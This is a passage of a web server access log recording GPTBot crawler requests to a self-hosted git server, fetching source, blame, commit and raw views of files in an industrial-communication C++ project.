12392] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10608] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11397] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11396] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11397] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12046] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15178] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 11792] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21647] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16833] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21643] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16830] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10239] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11024] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15432] [Gzip 8.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10237] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10818] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10818] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15142] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15229] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11577] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15251] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 